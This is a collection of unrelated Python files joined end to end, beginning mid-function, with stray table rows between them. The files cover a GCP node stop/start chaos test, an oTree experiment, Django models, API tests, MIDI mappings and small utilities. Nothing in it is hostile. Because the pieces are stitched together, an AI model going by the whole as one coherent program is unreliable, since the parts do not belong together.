    ax.set_title('b) Effect of b on Lake Dynamics',loc='left')
    fig.set_size_inches([8,11.85])
    fig.savefig('Figure1.pdf')
    fig.clf()
    return None
# Generate the figure when the module is executed.
makeFigure1()
import sys
import time
from googleapiclient import discovery
from oauth2client.client import GoogleCredentials
import logging
class gcp_node_scenarios():
    """Chaos scenarios that stop/start GCP compute instances backing k8s nodes."""

    def __init__(self, project):
        """:param project: GCP project id the instances live in."""
        self.project = project
        logging.info("project " + str(self.project) + "!")
        credentials = GoogleCredentials.get_application_default()
        self.client = discovery.build('compute', 'v1', credentials=credentials,
                                      cache_discovery=False)

    # Node scenario to stop the node
    def node_stop_scenario(self, node):
        """Stop the instance backing *node* and wait for TERMINATED state."""
        logging.info('stop scenario')
        try:
            logging.info("Starting node_stop_scenario injection")
            instance_id, zone = self.get_instance_id(node)
            logging.info("Stopping the node %s with instance ID: %s " % (node, instance_id))
            self.stop_instances(zone, instance_id)
            self.wait_until_stopped(zone, instance_id, 80)
            logging.info("Node with instance ID: %s is in stopped state" % instance_id)
            # Consistency with node_start_scenario's success message.
            logging.info("node_stop_scenario has been successfully injected!")
        except Exception as e:
            logging.error("Failed to stop node instance. Encountered following exception: %s. "
                          "Test Failed" % (e))
            logging.error("node_stop_scenario injection failed!")
            sys.exit(1)

    # Node scenario to start the node
    def node_start_scenario(self, node):
        """Start the instance backing *node* and wait for RUNNING state."""
        try:
            logging.info("Starting node_start_scenario injection")
            instance_id, zone = self.get_instance_id(node)
            logging.info("Starting the node %s with instance ID: %s " % (node, instance_id))
            self.start_instances(zone, instance_id)
            self.wait_until_running(zone, instance_id, 80)
            logging.info("Node with instance ID: %s is in running state" % instance_id)
            logging.info("node_start_scenario has been successfully injected!")
        except Exception as e:
            logging.error("Failed to start node instance. Encountered following "
                          "exception: %s. Test Failed" % (e))
            logging.error("node_start_scenario injection failed!")
            sys.exit(1)

    # Get the instance ID of the node
    def get_instance_id(self, node):
        """Scan all zones for an instance whose name is contained in *node*.

        :return: (instance_name, zone_name), or None when nothing matches.
        """
        zone_request = self.client.zones().list(project=self.project)
        while zone_request is not None:
            zone_response = zone_request.execute()
            for zone in zone_response['items']:
                instances_request = self.client.instances().list(project=self.project,
                                                                 zone=zone['name'])
                while instances_request is not None:
                    instance_response = instances_request.execute()
                    if "items" in instance_response.keys():
                        for instance in instance_response['items']:
                            if instance['name'] in node:
                                return instance['name'], zone['name']
                    # Bug fix: paginate the *instances* listing. The original
                    # called zones().list_next here, which never advances the
                    # instance pages.
                    instances_request = self.client.instances().list_next(
                        previous_request=instances_request,
                        previous_response=instance_response)
            zone_request = self.client.zones().list_next(previous_request=zone_request,
                                                         previous_response=zone_response)
        logging.info('no instances ')

    # Start the node instance
    def start_instances(self, zone, instance_id):
        self.client.instances().start(project=self.project, zone=zone, instance=instance_id) \
            .execute()

    # Stop the node instance
    def stop_instances(self, zone, instance_id):
        self.client.instances().stop(project=self.project, zone=zone, instance=instance_id) \
            .execute()

    # Get instance status
    def get_instance_status(self, zone, instance_id, expected_status, timeout):
        """Poll the instance status every 5s until it matches or timeout elapses.

        :return: True when the expected status is observed, False on timeout.
        """
        # statuses: PROVISIONING, STAGING, RUNNING, STOPPING, SUSPENDING, SUSPENDED,
        # REPAIRING, and TERMINATED.
        elapsed = 0
        sleeper = 5
        while elapsed <= timeout:
            inst_status = self.client.instances().get(project=self.project, zone=zone,
                                                      instance=instance_id).execute()
            logging.info("Status of vm " + str(inst_status['status']))
            if inst_status['status'] == expected_status:
                return True
            time.sleep(sleeper)
            elapsed += sleeper
        # Bug fix: the original log line had unfilled %s placeholders
        # ("Status of %s was not %s in a").
        logging.info("Status of instance %s was not %s within %s seconds"
                     % (instance_id, expected_status, timeout))
        return False

    # Wait until the node instance is running
    def wait_until_running(self, zone, instance_id, timeout):
        return self.get_instance_status(zone, instance_id, 'RUNNING', timeout)

    # Wait until the node instance is stopped
    def wait_until_stopped(self, zone, instance_id, timeout):
        return self.get_instance_status(zone, instance_id, 'TERMINATED', timeout)
from otree.api import *
import itertools
doc = """
Within-subject design, with three treatment conditions. Orders of the treatment
will be balanced as long as the subjects arrive in multiples of 6.
"""
class C(BaseConstants):
    NAME_IN_URL = 'balanced_treatment_within_subject'
    PLAYERS_PER_GROUP = None
    # On treatment and how they repeat
    NUM_Repeated_Rounds_Treatment_Condition = 10
    NUM_Treatment_Conditions = 3
    # On what to show before/after the rounds
    NUM_LeaderPage = 1
    NUM_FinishPage = 1
    # Welcome page + ROUNDS + Results page
    NUM_ROUNDS = (
        NUM_LeaderPage  # Start page
        + NUM_Treatment_Conditions  # Intro for each treatment
        + NUM_Repeated_Rounds_Treatment_Condition * NUM_Treatment_Conditions
        + NUM_FinishPage  # Finish page
    )
    # Round numbers at which a TreatmentIntro page is displayed: one intro
    # before each block of repeated task rounds.
    ROUNDS_for_TreatmentIntro = [
        # Here, name the rounds in which TreatmentIntro needs to be displayed
        (NUM_LeaderPage + 1),
        # Then,
        (
            NUM_LeaderPage + 1 + NUM_Repeated_Rounds_Treatment_Condition
            + 1),
        (
            NUM_LeaderPage + 1 + NUM_Repeated_Rounds_Treatment_Condition
            + 1 + NUM_Repeated_Rounds_Treatment_Condition + 1)
    ]
    FULL_list_of_rounds = list(range(1,NUM_ROUNDS + 1))
    # Task rounds for each treatment block. Round r sits at index r-1 in
    # FULL_list_of_rounds, so slicing from index ROUNDS_for_TreatmentIntro[k]
    # starts at the round immediately AFTER that block's intro page.
    ROUNDS_for_T1 = FULL_list_of_rounds[ROUNDS_for_TreatmentIntro[0] : ROUNDS_for_TreatmentIntro[0] + NUM_Repeated_Rounds_Treatment_Condition]
    ROUNDS_for_T2 = FULL_list_of_rounds[ROUNDS_for_TreatmentIntro[1] : ROUNDS_for_TreatmentIntro[1] + NUM_Repeated_Rounds_Treatment_Condition]
    ROUNDS_for_T3 = FULL_list_of_rounds[ROUNDS_for_TreatmentIntro[2] : ROUNDS_for_TreatmentIntro[2] + NUM_Repeated_Rounds_Treatment_Condition]
    ROUND_for_FinishPage = NUM_ROUNDS
    # Parameters of the simple demand function
    # print(ROUNDS_for_TreatmentIntro)
    # print(ROUNDS_for_T1)
    # print(ROUNDS_for_T2)
    # print(ROUNDS_for_T3)
class Subsession(BaseSubsession):
    # No subsession-level state; treatment assignment is done in creating_session().
    pass
def creating_session(subsession: Subsession):
    """Assign each round-1 player one of the six orderings of treatments 1-3.

    The orderings cycle through all permutations, so arrival in multiples of
    six yields a balanced design.
    """
    orderings = itertools.cycle(itertools.permutations([1, 2, 3]))
    if subsession.round_number == 1:
        for player in subsession.get_players():
            # Log the assigned treatment ordering on the participant.
            player.participant.treatment_sequence = next(orderings)
class Group(BaseGroup):
    # No group-level state (PLAYERS_PER_GROUP is None, i.e. single-player design).
    pass
class Player(BasePlayer):
    # The participant's treatment ordering persisted as a "1-2-3"-style string
    # (set in WelcomePage.before_next_page).
    treatment_sequence = models.StringField()
    # Worker-page flag; defaults to 0 (False). NOTE(review): never written in
    # this file — presumably set from a template form; confirm.
    worker_page_choice = models.BooleanField(initial=0)
# PAGES
class WelcomePage(Page):
    """Intro page shown only during the leader round(s)."""

    @staticmethod  # consistency: is_displayed already used @staticmethod
    def vars_for_template(player: Player):
        # Counts displayed in the welcome text.
        return dict(
            num_of_treatments=C.NUM_Treatment_Conditions,
            num_of_repeats=C.NUM_Repeated_Rounds_Treatment_Condition,
            total_rounds=C.NUM_ROUNDS,
        )

    @staticmethod
    def is_displayed(player: Player):
        return player.round_number <= C.NUM_LeaderPage

    @staticmethod
    def before_next_page(player: Player, timeout_happened):
        # Persist the assigned ordering as a readable "1-2-3" string.
        player.treatment_sequence = "-".join([str(T) for T in player.participant.treatment_sequence])
class ExpConditionIntro(Page):
    """Shown once at the start of each treatment block."""

    @staticmethod
    def vars_for_template(player: Player):
        # Decide current treatment from treatment_sequence and round_number.
        # Using .index() removes the original risk of an unbound local when
        # the round is unexpected (now raises ValueError instead).
        block_index = C.ROUNDS_for_TreatmentIntro.index(player.round_number)
        treatment_for_round = player.participant.treatment_sequence[block_index]
        return dict(
            treatment_for_round=treatment_for_round,
            sequence=player.participant.treatment_sequence,  # for diagnostics only. Remove for production.
        )

    @staticmethod
    def is_displayed(player: Player):
        # Explicit boolean instead of the original implicit None on False.
        return player.round_number in C.ROUNDS_for_TreatmentIntro
class WorkerPage(Page):
    """The repeated task page; shown for every round inside a treatment block."""

    @staticmethod
    def vars_for_template(player: Player):
        # Map the current round to its treatment block and progress counter.
        if player.round_number in C.ROUNDS_for_T1:
            rounds_under_same_treatment = C.ROUNDS_for_T1
            treatment_for_round = player.participant.treatment_sequence[0]
        elif player.round_number in C.ROUNDS_for_T2:
            rounds_under_same_treatment = C.ROUNDS_for_T2
            treatment_for_round = player.participant.treatment_sequence[1]
        elif player.round_number in C.ROUNDS_for_T3:
            rounds_under_same_treatment = C.ROUNDS_for_T3
            treatment_for_round = player.participant.treatment_sequence[2]
        else:
            # is_displayed() should make this unreachable; fail loudly instead
            # of the original debug prints followed by an UnboundLocalError.
            raise ValueError(
                "WorkerPage displayed in unexpected round %s" % player.round_number)
        # Progress indicator: position of this round within its block (1-based).
        round_count_out_of_Total = rounds_under_same_treatment.index(player.round_number) + 1
        return dict(
            treatment_for_round=treatment_for_round,
            round_count_out_of_Total=round_count_out_of_Total,
        )

    @staticmethod
    def is_displayed(player: Player):
        return (
            player.round_number in C.ROUNDS_for_T1
            or player.round_number in C.ROUNDS_for_T2
            or player.round_number in C.ROUNDS_for_T3
        )
class Results(Page):
    """Final page, shown only in the very last round."""

    @staticmethod
    def is_displayed(player: Player):
        # Explicit boolean instead of the original implicit None on False.
        return player.round_number == C.ROUND_for_FinishPage
page_sequence = [WelcomePage, ExpConditionIntro, WorkerPage, Results]
| 6,004 | 1,945 |
# mathematical operations
first_value = 5
second_value = 4
# Renamed from ``sum`` so the builtin sum() is not shadowed.
total = first_value + second_value
difference = first_value - second_value
product = first_value * second_value
quotient = first_value / second_value
modulus = first_value % second_value
exponent = first_value ** second_value
print('Sum: ' + str(total))
print('Difference: ' + str(difference))
print('Product: ' + str(product))
print('Quotient: ' + str(quotient))
print('Modulus: ' + str(modulus))
print('Exponent: ' + str(exponent))
# control the default order of operations
print(3 + 4 * 5)
print((3 + 4) * 5)
# investigate division: / is true division and always yields a float
first_value = 5
second_value = 4
quotient = first_value / second_value
print(type(quotient))
print(quotient)
# convert a float into an int (int() truncates toward zero)
pi = 3.14
print(type(pi))
print(int(pi))
uptime = 99.99
print(type(uptime))
print(int(uptime))
# round the number (round() rounds to nearest, unlike int())
pi = 3.14
print(type(pi))
print(int(pi))
print(round(pi))
uptime = 99.99
print(type(uptime))
print(int(uptime))
print(round(uptime))
# rounds to a specific decimal place
first_value = round(7.654321, 2)
print(first_value)
second_value = round(9.87654, 3)
print(second_value)
import numpy as np
from sklearn.cluster import KMeans
class DiscretizeParam(object):
    """Bundle of (feature name, discretization function, bucket count).

    The original also declared ``feature_name``/``discretize_function``/
    ``buckets_amount`` as class-level ``None`` attributes; they were always
    shadowed by the instance attributes set below, so they are removed.
    """

    def __init__(self, feature_name, discretize_function, buckets_amount):
        self.feature_name = feature_name
        self.discretize_function = discretize_function
        self.buckets_amount = buckets_amount

    def __repr__(self):
        return "DP<{}, {}, {}>".format(self.feature_name, self.discretize_function.__name__, self.buckets_amount)
class Discretizer(object):
    """Namespace of discretization helpers with shared per-key model caches.

    Caches are keyed by (dataset_name, feature_name, buckets) and are class
    level on purpose so repeat calls reuse the fitted bins/models.
    """

    bucket_models = {}
    frequency_models = {}
    kmean_models = {}

    # Bug fix: the original methods were defined without ``self`` and without
    # @staticmethod, so calling them on a Discretizer *instance* raised a
    # TypeError. @staticmethod keeps Discretizer.method(...) calls working and
    # makes instance calls work too.
    @staticmethod
    def bucket_discretize(dataset_name, feature_name, values, current_value, buckets):
        """Equal-width binning over [min(values), max(values)]; returns the bin index."""
        key = (dataset_name, feature_name, buckets)
        if key not in Discretizer.bucket_models:
            Discretizer.bucket_models[key] = np.linspace(min(values), max(values), buckets)
        bins = Discretizer.bucket_models[key]
        return np.digitize(current_value, bins)

    @staticmethod
    def frequency_discretize(dataset_name, feature_name, values, current_value, buckets):
        """Equal-frequency (quantile-like) binning; returns the bin index."""
        key = (dataset_name, feature_name, buckets)
        if key not in Discretizer.frequency_models:
            chunks = np.array_split(np.sort(values), buckets)
            # Upper edge of each chunk; the last edge is open-ended and dropped.
            cutoffs = [chunk[-1] for chunk in chunks][:-1]
            Discretizer.frequency_models[key] = cutoffs
        return np.digitize(current_value, Discretizer.frequency_models[key], right=True)

    @staticmethod
    def kbins_discretize(dataset_name, feature_name, values, current_value, buckets):
        """1-D k-means binning (values embedded as (v, 0) points); returns the cluster id."""
        key = (dataset_name, feature_name, buckets)
        if key not in Discretizer.kmean_models:
            values2D = np.array([[v, 0] for v in values])
            Discretizer.kmean_models[key] = KMeans(n_clusters=buckets, random_state=0).fit(values2D)
        kmeans = Discretizer.kmean_models[key]
        return kmeans.predict(np.array([[current_value, 0]]))[0]
| 2,085 | 718 |
import unittest
from trader.binanceCom import BinanceCom
class TestBinanceCom(unittest.TestCase):
    """Integration tests hitting the live Binance API via BinanceCom.

    NOTE(review): these require network access and valid default credentials
    on BinanceCom; they are not isolated unit tests.
    """
    def test_connect_to_account(self):
        bc = BinanceCom()
        # A client object is returned for valid keys; missing keys must raise.
        self.assertIsNotNone(bc.connect_to_account(bc.default_Key, bc.default_Secret))
        self.assertRaises(ValueError, bc.connect_to_account, None, None)
    def test_get_coin_info(self):
        bc = BinanceCom()
        client=bc.connect_to_account(bc.default_Key, bc.default_Secret)
        coin_info = bc.get_coin_info(client, "BTCUSDT")
        # Ticker payload must expose the standard 24h statistics fields.
        self.assertTrue('symbol' in coin_info)
        self.assertTrue('lastPrice' in coin_info)
        self.assertTrue('openPrice' in coin_info)
        self.assertTrue('volume' in coin_info)
        self.assertTrue('highPrice' in coin_info)
        self.assertTrue('lowPrice' in coin_info)
# Run the test suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
# Copyright 2020 Jack Spencer Smith.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
from enum import Enum
class Family(Enum):
    """Coarse instrument families used to group General MIDI programs."""
    BASS = 0
    BRASS = 1
    FLUTE = 2
    GUITAR = 3
    KEYBOARD = 4
    MALLET = 5
    ORGAN = 6
    REED = 7
    STRING = 8
    SYNTH_LEAD = 9
    VOCAL = 10
    OTHER = 11
    DRUMS = 12


# General MIDI program number (0-based) -> Family; unknown programs map to
# OTHER via the defaultdict. Built from contiguous program ranges instead of
# the original 100+ literal dict entries (same resulting mapping).
_PROGRAM_RANGES = [
    (range(0, 8), Family.KEYBOARD),
    (range(8, 16), Family.MALLET),
    (range(16, 24), Family.ORGAN),
    (range(24, 32), Family.GUITAR),
    (range(32, 40), Family.BASS),
    (range(40, 52), Family.STRING),   # 47 (timpani?) kept as STRING, as before
    (range(52, 55), Family.VOCAL),
    (range(55, 56), Family.STRING),   # orch hit
    (range(56, 64), Family.BRASS),
    (range(64, 72), Family.REED),
    (range(72, 80), Family.FLUTE),
    (range(80, 85), Family.SYNTH_LEAD),
    (range(85, 86), Family.VOCAL),    # program 85 was classed as VOCAL
    (range(86, 88), Family.SYNTH_LEAD),
    (range(105, 109), Family.GUITAR),
    (range(109, 110), Family.MALLET),
    (range(110, 111), Family.REED),
    (range(111, 112), Family.STRING),
    (range(112, 113), Family.REED),
    (range(113, 115), Family.MALLET),
]

midi_instrument_to_family = collections.defaultdict(lambda: Family.OTHER)
for _range, _family in _PROGRAM_RANGES:
    for _program in _range:
        midi_instrument_to_family[_program] = _family
# Family.value -> representative (1-based) General MIDI program used when
# rendering a family back to a concrete MIDI instrument.
family_to_midi_instrument = {
    0: 33,  # Acoustic Bass
    1: 57,  # Trumpet
    2: 74,  # Flute
    3: 25,  # Acoustic Nylon Guitar
    4: 1,  # keyboard / Acoustic Grand Piano
    5: 9,  # mallet / Celesta
    6: 17,  # organ / Drawbar Organ
    7: 66,  # reed / Alto Sax
    8: 49,  # string / String Ensemble
    9: 83,  # synth lead / Square
    10: 54,  # vocal / Voice Oohs
    11: 118,  # other
    12: 119,  # TODO actual percussion
}
| 3,652 | 1,623 |
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*-
# vim: tabstop=2:shiftwidth=2:noexpandtab
# kate: tab-width 2; replace-tabs off; indent-width 2;
#
# ==============================================================================
# Authors: Patrick Lehmann
#
# Python Package: Saves the pyIPCMI configuration as python source code.
#
# License:
# ==============================================================================
# Copyright 2017-2018 Patrick Lehmann - Bötzingen, Germany
# Copyright 2007-2016 Technische Universität Dresden - Germany
# Chair of VLSI-Design, Diagnostics and Architecture
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# load dependencies
from lib.ExtendedConfigParser import ExtendedConfigParser
from pyIPCMI.Base.Logging import ILogable
__api__ = [
'IHost'
]
__all__ = __api__
class IHost(ILogable):
    """This is a type hint class (interface description) for a host instance.
    It's needed until pyIPCMI requires Python 3.6.
    """
    # instance fields (placeholder values standing in for 3.6 variable annotations)
    Platform = "string"            # actual type: str
    Config = ExtendedConfigParser()
    # methods
    def SaveAndReloadConfiguration(self): pass  # interface stub; implemented by concrete hosts
    # Syntax not supported by Python 3.5 -> requires 3.6
    # Platform : str = None
    # Config : ExtendedConfigParser = None
| 1,898 | 556 |
from goopylib.imports import *
# Open a 700x700 dark-grey test window with a small circle at its centre.
window = Window(title="Test Window", width=700, height=700, bk_colour=ColourRGB(40, 40, 40))
Circle([350, 350], 10).draw(window)
# Pump GUI events until the user closes the window.
while window.is_open():
    window.update()
| 207 | 92 |
import unittest
from project import group_s
from project import printer_s
from project import member_s
from pyactor.context import set_context, create_host, shutdown, sleep
class TestGroup(unittest.TestCase):
    """Integration test of the pyactor group membership timeout behaviour."""
    def setUp(self):
        # Gets executed before every test: fresh actor context with one
        # printer actor and one group actor that uses it.
        set_context()
        self.h = create_host()
        self.p = self.h.spawn('printer', printer_s.Printer)
        self.g = self.h.spawn('group', group_s.Group, [self.p])
    def tearDown(self):
        # Gets executed after every test
        shutdown()
    def test_members_leave(self):
        # Test if members join and leave correctly if not announced
        m1 = self.h.spawn('m1', member_s.Member, [self.p, self.g])
        self.g.join(m1)
        self.g.init_start()
        self.assertTrue(len(self.g.get_members()) == 1)
        # Wait past the announce timeout window.
        sleep(12)
        # Test that if no announces are made by the peer, it gets kicked out
        self.assertTrue(len(self.g.get_members()) == 0)
# Run the suite when executed directly.
if __name__ == '__main__':
    # Bug fix: the original loaded ``TestStringMethods``, which is undefined
    # in this module (NameError); the test case defined here is TestGroup.
    suite = unittest.TestLoader().loadTestsFromTestCase(TestGroup)
    unittest.TextTestRunner(verbosity=2).run(suite)
| 1,123 | 365 |
# Package: largescale.src.neuron.neuron
from neuron import NeuronGroup
from neuron import T_EXCITATORY, T_INHIBITORY, T_EXC, T_E, T_INH, T_I
from neuron import T_ON, T_OFF, T_O, T_F
| 188 | 89 |
# coding: utf8
import os
BASE_URL = 'http://jsonplaceholder.typicode.com'
SKIP_REAL = os.getenv('SKIP_REAL', False)  # Global flag: skip tests that hit the real service (useful in local development). NOTE(review): env vars are strings, so any non-empty value is truthy.
from os import getcwd
from os.path import isfile
from os.path import join
from os import listdir
from datetime import datetime
# Obrigado Fabrício por me mostrar como criar um log em python e por ser um
# colega incrível :)
# Obrigado Fabrício por me mostrar como criar um log em python e por ser um
# colega incrível :)
def filelog(name, desc):
    """Append a timestamped entry *desc* to today's CHARLIE log file.

    ``name`` selects the log directory under the current working directory:
      - "PY_F": results/log_py/ERROR
      - "PY_S": results/log_py/SUCCESS
      - "RF":   results/log_rf/
    A banner header is written the first time a file for today's date appears
    in the directory.

    :raises ValueError: for an unknown ``name`` (the original fell through to
        an obscure UnboundLocalError on ``path_logs``).
    """
    subdirs = {
        "PY_F": "/results/log_py/ERROR",
        "PY_S": "/results/log_py/SUCCESS",
        "RF": "/results/log_rf/",
    }
    if name not in subdirs:
        raise ValueError("unknown log target: %r" % (name,))
    path_logs = getcwd() + subdirs[name]
    # Current date and date-time stamps.
    data = datetime.now().strftime("%d-%m-%Y")
    data_hora = datetime.now().strftime("%d-%m-%Y__%H:%M:%S")
    log_file = join(path_logs, "CHARLIE_" + data + ".txt")
    existing = [f for f in listdir(path_logs) if isfile(join(path_logs, f))]
    if any(data in fname for fname in existing):
        # A log for today already exists: append the entry only.
        with open(log_file, "a") as file:
            file.write(data_hora + " : " + desc + '\n')
        return
    # First entry of the day: write the banner header before the entry.
    with open(log_file, "a") as file:
        file.write("|===================================================|\n" +
                   "|\t\t\t\t PROJEKT CHARLIE \t\t\t\t\t|\n" +  # pov: cursed python
                   "|===================================================|\n\n\n" +
                   data_hora + " : " + desc + '\n')
    return
from idunn.places import PjApiPOI
from idunn.places.models import pj_info
def test_categories_pj():
    """Each PJ category name must map to the expected POI class/subclass pair."""
    def poi_with(categories):
        payload = {"categories": [{"category_name": c} for c in categories]}
        return PjApiPOI(pj_info.Response(**payload))

    # No category at all -> no class/subclass.
    empty_poi = poi_with([])
    assert empty_poi.get_class_name() is None
    assert empty_poi.get_subclass_name() is None

    cases = [
        (["restaurants"], "restaurant", "restaurant"),
        (["hôtels"], "lodging", "lodging"),
        (["salles de cinéma"], "cinema", "cinema"),
        (["salles de concerts, de spectacles"], "theatre", "theatre"),
        (["Pharmacie"], "pharmacy", "pharmacy"),
        (["supermarchés, hypermarchés"], "supermarket", "supermarket"),
        (["banques"], "bank", "bank"),
        (["cafés, bars"], "bar", "bar"),
        (["des supers écoles de fou"], "school", "school"),
        # Multiple categories: the first recognised one wins.
        (["grandes études", "ou bien l'enseignement supérieur"], "college", "college"),
        ([" Psychologue "], "doctors", "doctors"),
        (["vétérinaires"], "veterinary", "veterinary"),
        # Unrelated first category is skipped in favour of a recognised one.
        (["unrelated category", "garages automobiles"], "car", "car_repair"),
    ]
    for categories, expected_class, expected_subclass in cases:
        poi = poi_with(categories)
        assert poi.get_class_name() == expected_class
        assert poi.get_subclass_name() == expected_subclass
| 3,098 | 1,087 |
# coding: utf-8
from django.utils.translation import ugettext as _
from django.db import models
from django.core.urlresolvers import reverse
from django.utils import timezone
class Firm(models.Model):
    """A company we work for, with its invoicing period in months."""
    name = models.CharField(max_length=60, verbose_name=_('firm name'))
    # How often (in months) an invoice is issued for this firm.
    periode = models.IntegerField(default=1,
                                  verbose_name=_('periode [months]'),
                                  help_text=_('How often we make an invoice.'))
    from_date = models.DateField(default=timezone.now, verbose_name=_('from date'))
    description = models.TextField(blank=True, verbose_name=_('description'))
    # Lets a firm be hidden from list views without deleting its records.
    show_in_list = models.BooleanField(default=True, verbose_name=_('show in list'))

    def get_absolute_url(self):
        """Return the canonical detail URL for this firm."""
        return reverse('work_evid:firm_detail', kwargs={'pk': self.pk})

    class Meta:
        ordering = ['name']
        verbose_name = _('firm')

    def __str__(self):
        return self.name
class Work(models.Model):
    """One unit of billable work done for a firm."""
    firm = models.ForeignKey(Firm, verbose_name=_('firm'))
    date = models.DateField(default=timezone.now, verbose_name=_('work date'))
    item_price = models.DecimalField(max_digits=15,
                                     decimal_places=2,
                                     verbose_name=_('price for item'))
    # Fractional amounts are allowed (e.g. hours), hence DecimalField.
    items = models.DecimalField(max_digits=10,
                                decimal_places=2,
                                default=1,
                                verbose_name=_('ammount of items'))
    what_brief = models.CharField(max_length=80, verbose_name=_('what (briefly)'))
    what_detailed = models.TextField(blank=True, verbose_name=_('describe detailed'))

    @property
    def full_price(self):
        """Return item price multiplied by the amount of items."""
        return self.items * self.item_price

    def get_absolute_url(self):
        """Return the canonical detail URL for this work record."""
        return reverse('work_evid:work_detail', kwargs={'pk': self.pk})

    class Meta:
        ordering = ['-date']
class Todo(models.Model):
    """A per-firm todo note with a finished flag."""
    firm = models.ForeignKey(Firm, verbose_name=_('firm'))
    date = models.DateField(default=timezone.now, verbose_name=_('created'))
    todo = models.TextField(blank=True, verbose_name=_('todo'))
    finished = models.BooleanField(default=False, verbose_name=_('finished'))

    def __str__(self):
        # BUG FIX: `self.firm` is a Firm instance and does not support
        # slicing; use the firm's name (which is what Firm.__str__ shows).
        return '{0} {1} {2}'.format(self.date, self.firm.name[:12], self.todo[:40])

    def get_absolute_url(self):
        """Return the canonical detail URL for this todo."""
        return reverse('work_evid:todo_detail', kwargs={'pk': self.pk})

    class Meta:
        # Unfinished first, newest first within each group.
        ordering = ['finished', '-date']
| 2,631 | 805 |
import asyncio
from asyncio.events import AbstractEventLoop
from unittest import TestCase
from unittest.mock import Mock, MagicMock
from cadence.decision_loop import ReplayDecider, ITask
from cadence.tests.test_decision_context import run_once
class TestAwaitTill(TestCase):
    """Exercises ITask.await_till blocking and unblocking behaviour."""

    def setUp(self) -> None:
        self.event_loop: AbstractEventLoop = asyncio.get_event_loop()
        decider = Mock()
        decider.get_and_increment_next_id = MagicMock(return_value="0")
        decider.event_loop = Mock()
        # Hand the task a real future so await_till can actually suspend on it.
        self.future = self.event_loop.create_future()
        decider.event_loop.create_future = MagicMock(return_value=self.future)
        self.decider: ReplayDecider = decider
        self.itask = ITask(decider=decider)

    def tearDown(self) -> None:
        self.task.cancel()

    def test_await_till(self):
        # Predicate never succeeds, so a single tick leaves the task awaited.
        self.task = self.event_loop.create_task(self.itask.await_till(lambda *args: None))
        run_once(self.event_loop)
        assert self.itask.awaited

    def test_await_till_no_progress(self):
        self.task = self.event_loop.create_task(self.itask.await_till(lambda *args: None))
        # Running the loop repeatedly must not spuriously wake the task.
        for _ in range(2):
            run_once(self.event_loop)
            assert self.itask.awaited

    def test_unblock(self):
        blocked = True

        def check_blocked():
            nonlocal blocked
            return not blocked

        self.task = self.event_loop.create_task(self.itask.await_till(check_blocked))
        run_once(self.event_loop)
        # Flip the condition and notify: the task must stop being awaited.
        blocked = False
        self.itask.unblock()
        run_once(self.event_loop)
        assert not self.itask.awaited
| 1,638 | 532 |
from dataclasses import dataclass
from typing import List
from .matching import (
ConstantOpBuilder, Context, Matchable, PatternBuilder, VarOpBuilder
)
class Term(Matchable['TermOp']):
    """Base class for pattern-matchable term-tree nodes."""
    pass
@dataclass
class Val(Term):
    """Leaf term holding a constant string value."""
    value: str

    def handle_match_op(self, op: 'TermOp', ctx: Context['TermOp']) -> bool:
        # Double dispatch: let the op decide how to treat a Val.
        return op.handle_val(self, ctx)
@dataclass
class Func(Term):
    """Interior term: a named function applied to argument terms."""
    name: str
    args: List[Term]

    def handle_match_op(self, op: 'TermOp', ctx: Context['TermOp']) -> bool:
        # Double dispatch: let the op decide how to treat a Func.
        return op.handle_func(self, ctx)
class TermOp:
    """One matching instruction; subclasses override per term kind."""

    def handle_term(self, term: Term, ctx: Context['TermOp']) -> bool:
        # Default: an op matches nothing unless a subclass says otherwise.
        return False

    def handle_func(self, term: Func, ctx: Context['TermOp']) -> bool:
        return self.handle_term(term, ctx)

    def handle_val(self, term: Val, ctx: Context['TermOp']) -> bool:
        return self.handle_term(term, ctx)
class MatchFunc(TermOp):
    """Matches a Func node with a given name and argument count."""

    def __init__(self, name: str, arity: int):
        self.name = name
        self.arity = arity

    def handle_func(self, term: Func, ctx: Context[TermOp]) -> bool:
        # Succeed only on an exact name/arity match, then queue the
        # arguments (reversed so they are consumed left-to-right).
        if self.name == term.name and self.arity == len(term.args):
            ctx.push_terms(reversed(term.args))
            return True
        return False
class MatchVal(TermOp):
    """Matches a Val leaf carrying exactly the expected string."""

    def __init__(self, value: str):
        self.value = value

    def handle_val(self, term: Val, ctx: Context[TermOp]) -> bool:
        return self.value == term.value
class BindVar(TermOp):
    """Matches any term and records it as the next bound variable."""

    def handle_term(self, term: Term, ctx: Context[TermOp]) -> bool:
        ctx.push_var(term)
        return True
class MatchVar(TermOp):
    """Matches only a term equal to a previously bound variable."""

    def __init__(self, idx: int):
        # Index into the context's bound-variable list.
        self.idx = idx

    def handle_term(self, term: Term, ctx: Context[TermOp]) -> bool:
        return ctx.get_var(self.idx) == term
class MatchAny(TermOp):
    """Wildcard op: matches any single term without binding anything."""

    def handle_term(self, term: Term, ctx: Context[TermOp]) -> bool:
        return True
def func(name: str, *args: PatternBuilder[TermOp]) -> PatternBuilder[TermOp]:
    """Build a pattern matching a Func with *name* and the given arg patterns."""
    builder = PatternBuilder[TermOp].from_op(
        ConstantOpBuilder(MatchFunc(name, len(args)))
    )
    # Argument patterns follow the head op in order.
    for arg in args:
        builder = builder.concat(arg)
    return builder
def val(value: str) -> PatternBuilder[TermOp]:
    """Pattern matching a Val leaf with the given constant value."""
    return PatternBuilder.from_op(ConstantOpBuilder(MatchVal(value)))
def v(name: str) -> PatternBuilder[TermOp]:
    """Named pattern variable: binds on first use, must match on reuse."""
    return PatternBuilder.from_op(VarOpBuilder(name, BindVar, MatchVar))


# Anonymous wildcard pattern: matches any single term, binds nothing.
_ = PatternBuilder.from_op(ConstantOpBuilder(MatchAny()))
| 2,450 | 795 |
from .wrapper import create_optim_wrapper | 41 | 10 |
import json
